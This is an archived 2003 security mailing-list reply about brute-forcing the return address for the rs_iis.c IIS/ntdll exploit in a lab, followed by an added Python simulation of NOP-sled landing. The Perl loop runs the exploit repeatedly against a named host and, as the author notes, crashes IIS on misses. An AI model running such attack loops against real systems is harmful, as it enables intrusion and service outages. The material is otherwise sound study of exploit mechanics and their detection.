
RE: Generating Hex Numbers to brute force rs_iis.c

From: Joshua Wright <Joshua.Wright(at)jwu.edu>
Date: Wed Apr 02 2003 - 10:17:22 EST


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I'm no perl expert, but this is what I whipped up for a similar test:

use strict;
use warnings;

my $myserver = "pvdnet05";
for (my $i = 0; $i < 256; $i++) {
    # Always emit two hex digits (e.g. "0a", not "a") so the argument keeps a fixed width.
    my $retcode = sprintf("%02x", $i);
    my $exec = "./rs_iis $myserver 80 31337 " . $retcode . "04";
    system($exec);
    sleep(1);   # give the server a moment between attempts
}

Note that the last byte of the RET address is not terribly significant, since the NOP sled is ~65K in size and this value is only max 256 bytes significant.

This didn't work well for me, since IIS will sometimes crash without a valid RET address, requiring a server restart. I had meant to look for a way to restart Windows 2000 services from a Linux box with Samba or similar tool, but got bored with it and started trying to exploit something else. :)

pgpkey: http://home.jwu.edu/jwright/pgpkey.htm
fingerprint: FDA5 12FC F391 3740 E0AE BDB6 8FE2 FC0A D44B 4A73

> In playing with rs_iis.c (ntdll exploit) in our lab, I've been

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>


iQA/AwUBPor/AY/i/ArUS0pzEQJ75wCeNFPqMa0+AwwuCcYgb7YwRdt98KsAn2HZ Il0dIPyWAX6swPIQfg/LvvQk
=hz0W
-----END PGP SIGNATURE-----

Received on Thu Apr 3 13:07:09 2003
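As an added illustration that is not part of the original post, the small Python model below works through the note about the sled: with the upper bytes of RET held fixed, sweeping the varied byte through 00..ff (as the Perl loop does) moves the landing point by at most 255 bytes, so against a ~65K sled every candidate in one sweep lands in the same region unless the 256-byte window happens to straddle a region boundary. Every miss is a service fault on the target, which is what made the author's run crash IIS and is also what a defender would see. The sled address and sizes are constructed sample values, not taken from rs_iis.c.

```python
# Added model, not code from the original post or from rs_iis.c.
# Addresses and sizes below are constructed sample values chosen so that
# one sweep straddles the start of the sled and one straddles its end.

SLED_BASE = 0x00410080        # constructed: first byte of the NOP sled
SLED_SIZE = 65536             # ~65K sled, as the post states
SHELLCODE_SIZE = 512          # constructed: payload placed right after the sled

SLED_END = SLED_BASE + SLED_SIZE
PAYLOAD_END = SLED_END + SHELLCODE_SIZE


def classify_ret(ret: int) -> str:
    """Where does execution land if the overwritten return address is `ret`?"""
    if SLED_BASE <= ret < SLED_END:
        return "sled"        # slides down the NOPs into the payload
    if SLED_END <= ret < PAYLOAD_END:
        return "shellcode"   # lands mid-payload: unpredictable, usually a fault
    return "crash"           # outside the buffer: the service faults and needs a restart


def low_byte_sweep(upper_bytes: int) -> dict:
    """Sweep the last byte 00..ff with the upper three bytes fixed, like the
    Perl loop, and count where each of the 256 candidates lands."""
    counts = {"sled": 0, "shellcode": 0, "crash": 0}
    for low in range(256):
        counts[classify_ret((upper_bytes << 8) | low)] += 1
    return counts


if __name__ == "__main__":
    # 0x004180: wholly inside the sled, so all 256 guesses succeed.
    # 0x004100: window straddles the sled start, half the guesses fault.
    # 0x004200: window straddles the sled end, half land mid-shellcode.
    # 0x004300: wrong upper bytes, all 256 guesses fault the service.
    for upper in (0x004180, 0x004100, 0x004200, 0x004300):
        print(f"upper bytes {upper:06x}: {low_byte_sweep(upper)}")
```

The takeaway matches the post: the byte the loop varies never decides success on its own, and a sweep with wrong upper bytes produces 256 consecutive service faults, a pattern that stands out in crash and restart monitoring.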

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:38 EDT
